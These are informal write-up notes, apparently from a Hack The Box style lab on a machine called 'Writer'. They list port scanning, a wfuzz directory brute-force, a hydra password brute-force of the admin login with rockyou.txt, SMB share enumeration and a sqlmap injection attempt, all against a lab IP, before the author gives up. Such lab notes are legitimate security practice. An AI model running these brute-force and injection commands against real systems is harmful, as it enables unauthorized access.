Machine - Writer
nmap:
ports 22, 80, 139(smb), 445 (smb)
the web page seams pretty normal
fuzz
wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZwe found a couple of interesting urls
000000269: 301 9 L 28 W 313 Ch "static"
000001225: 302 3 L 24 W 208 Ch "logout"
000002927: 302 3 L 24 W 208 Ch "dashboard"
000015237: 200 34 L 99 W 1443 Ch "administrative"
in administrative there is a login panel, but we have no credentials
Could try to use hydra… with the user admin…
sudo hydra -l admin -P /usr/share/dict/rockyou.txt 10.10.11.101 http-post-form "/administrative:uname=admin&password=^PASS^:Incorrect"
Try enumerate users on smb as well
> smbmap.py -H 10.10.11.101
[+] IP: 10.10.11.101:445 Name: 10.10.11.101
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
writer2_project NO ACCESS
IPC$ NO ACCESS IPC Service (writer server (Samba, Ubuntu))
is using smbd 4.6.2
seems that there an exploit for it eternal red in metasploit
nothing… we need a writable smb shared
let’s try sql injection
wioth burp we get the request into a file
sqlmap -r $(pwd)/request
Abandon! :(
Machine - Driver
Machine - Horizontall